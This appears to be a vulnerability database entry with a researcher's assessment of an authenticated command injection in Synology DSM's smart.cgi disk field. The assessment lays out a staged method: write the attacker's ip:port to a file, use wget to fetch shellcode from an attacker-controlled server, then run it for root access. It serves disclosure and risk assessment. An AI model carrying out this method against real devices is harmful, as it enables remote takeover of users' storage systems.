Command injection vulnerability in smart.cgi in Synology DiskStation Manager (DSM) before 5.2-5967-5 allows remote authenticated users to execute arbitrary commands via disk field.
Recent assessments:
h00die at May 20, 2020 12:19pm UTC reported:
AUTHENTICATED command execution in webman/modules/StorageManager/smart.cgi
through either a GET
or POST
request.
Variables for the request look as such:
'action' => 'apply',
'operation' => 'quick',
'disk' => "/dev/sda"
The disk field is vulnerable. However, thatβs just where this fun begins. The disk
field is required to be βsemiβ disk correct. AKA you canβt just have nothing there, or a
, however /dev/sd
did seem to work. Next, when the command is passed off, the entire disk
field is limited to 30 characters. After shortening to /dev/sd
and then adding ticks (β`β) you are left with 22 characters. Pretty tight spacing.
To circumvent this restriction, the following was done:
in < 22 characters, echo -n
and ip:port to a file (/a
).
use wget -i /a -O <file>
to then pull back shell code from a attacker controlled HTTP server
execute the payload
Most likely step 1 will need to be done in > 1 steps.
Exploitation grants root privileges.
Assessed Attacker Value: 5
Assessed Attacker Value: 5Assessed Attacker Value: 2